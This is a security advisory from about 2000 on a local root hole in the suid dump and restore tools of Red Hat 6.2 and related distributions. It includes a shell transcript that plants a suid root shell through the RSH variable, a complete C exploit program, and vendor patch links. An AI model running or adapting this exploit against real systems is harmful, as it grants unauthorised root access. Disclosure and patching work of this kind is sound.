|
Vulnerability dump Affected dump-0.4b15 Description Mat found following. Linux dump command executes external program with suid priviledge. Example: [mat@localhost mat]$ export TAPE=garbage:garbage [mat@localhost mat]$ export RSH=/home/mat/execute_this [mat@localhost mat]$ cat > /home/mat/execute_this #!/bin/sh cp /bin/sh /home/mat/sh chmod 4755 /home/mat/sh [mat@localhost mat]$ chmod 755 /home/mat/execute_this [mat@localhost mat]$ /sbin/dump -0 / DUMP: Connection to garbage established. DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000 DUMP: Date of last level 0 dump: the epoch DUMP: Dumping /dev/hda2 (/) to garbage on host garbage DUMP: Label: none /dev/hda2: Permission denied while opening filesystem [mat@localhost mat]$ ls -la /home/mat/sh -rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh [mat@localhost mat]$ /home/mat/sh bash# id uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat) This is quick and dirty exploit: /* ** ** dump-0.4b15x.c ** ** dump-0.4b15 exploit: ** Redhat 6.2 dump command executes ** external program with suid priviledge. ** ** affected: ** /sbin/dump ** /sbin/dump.static ** /sbin/restore ** /sbin/restore.static ** ** Bug found by mat@hacksware.com ** ** This example was coded by md0claes@mdstud.chalmers.se ** It was written for EDUCATIONAL PURPOSES ONLY. ** ** */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define RUNME "/tmp/runme" /* tmp file */ #define SUID_PATH "/tmp/superdude" /* the power of root */ void usage(char *pname) { fprintf(stdout, "\nUsage: %s < d | s | r | p >\n\n", pname); fprintf(stdout, " d - exploit /sbin/dump\n"); fprintf(stdout, " s - exploit /sbin/dump.static\n"); fprintf(stdout, " r - exploit /sbin/restore\n"); fprintf(stdout, " p - exploit /sbin/restore.static\n\n"); } int main(int argc, char *argv[], char *envp[]) { int fd; pid_t pid; char *bad_env[] = { "TAPE=garbage:garbage", "RSH="RUNME }; char runbuf[] = { "#!/bin/sh\n/bin/cp /bin/bash " SUID_PATH "\nchmod 6755 " SUID_PATH }; char *suid[] = { SUID_PATH, NULL }; char *av[] = { "/sbin/restore.static", "restore.static", "-t", "/tmp/foo" }; if (argc != 2) { usage(argv[0]); exit(1); } switch(tolower(argv[1][0])) { case 'd': av[0] = "/sbin/dump"; av[1] = "dump"; av[2] = "-0"; av[3] = "/"; break; case 's': av[0] = "/sbin/dump.static"; av[1] = "dump.static"; av[2] = "-0"; av[3] = "/"; break; case 'r': av[0] = "/sbin/restore"; av[1] = "restore"; break; case 'p': break; default: usage(argv[0]); exit(1); } if ((fd = open(RUNME,O_WRONLY|O_CREAT|O_TRUNC, 0755)) == -1) { perror("fopen"); exit(1); } if (write(fd, runbuf, sizeof(runbuf)) == -1) { perror("write"); exit(1); } close(fd); if ((pid = fork()) < 0) { perror("fork"); exit(1); } else if (pid == 0) { if (execle(av[0], av[1], av[2], av[3], NULL, bad_env) < 0) { perror("execle"); _exit(1); } } sleep(1); unlink(RUNME); fprintf(stdout, "\nExploited %s \n", av[0]); fprintf(stdout, "Running " SUID_PATH "\n"); execve(SUID_PATH, suid, envp); exit(0); } Solution This is the location for the latest version ftp://ftp.sourceforge.net/pub/sourceforge/dump/ dump is no longer suid root. For RedHat: ftp://updates.redhat.com/5.2/alpha/dump-0.4b19-5.5x.alpha.rpm ftp://updates.redhat.com/5.2/alpha/dump-static-0.4b19-5.5x.alpha.rpm ftp://updates.redhat.com/5.2/alpha/rmt-0.4b19-5.5x.alpha.rpm ftp://updates.redhat.com/5.2/sparc/dump-0.4b19-5.5x.sparc.rpm ftp://updates.redhat.com/5.2/sparc/dump-static-0.4b19-5.5x.sparc.rpm ftp://updates.redhat.com/5.2/sparc/rmt-0.4b19-5.5x.sparc.rpm ftp://updates.redhat.com/5.2/i386/dump-0.4b19-5.5x.i386.rpm ftp://updates.redhat.com/5.2/i386/dump-static-0.4b19-5.5x.i386.rpm ftp://updates.redhat.com/5.2/i386/rmt-0.4b19-5.5x.i386.rpm ftp://updates.redhat.com/5.2/SRPMS/dump-0.4b19-5.5x.src.rpm ftp://updates.redhat.com/6.2/alpha/dump-0.4b19-5.6x.alpha.rpm ftp://updates.redhat.com/6.2/alpha/dump-static-0.4b19-5.6x.alpha.rpm ftp://updates.redhat.com/6.2/alpha/rmt-0.4b19-5.6x.alpha.rpm ftp://updates.redhat.com/6.2/sparc/dump-0.4b19-5.6x.sparc.rpm ftp://updates.redhat.com/6.2/sparc/dump-static-0.4b19-5.6x.sparc.rpm ftp://updates.redhat.com/6.2/sparc/rmt-0.4b19-5.6x.sparc.rpm ftp://updates.redhat.com/6.2/i386/dump-0.4b19-5.6x.i386.rpm ftp://updates.redhat.com/6.2/i386/dump-static-0.4b19-5.6x.i386.rpm ftp://updates.redhat.com/6.2/i386/rmt-0.4b19-5.6x.i386.rpm ftp://updates.redhat.com/6.2/SRPMS/dump-0.4b19-5.6x.src.rpm All released versions of Trustix Secure Linux contain a version of dump that is known to have a local root exploit. People with untrusted local users should upgrade as soon as possible. Get the packages at: ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/ http://www.trustix.net/download/Trustix/updates/1.1/RPMS/ dump-0.4b19-2tr.i586.rpm rmt-0.4b19-2tr.i586.rpm Conectiva last mandatory update of the dump package brought it up to version 0.4b18 and had the SUID bits disabled. These packages do not have the vulnerability discussed above.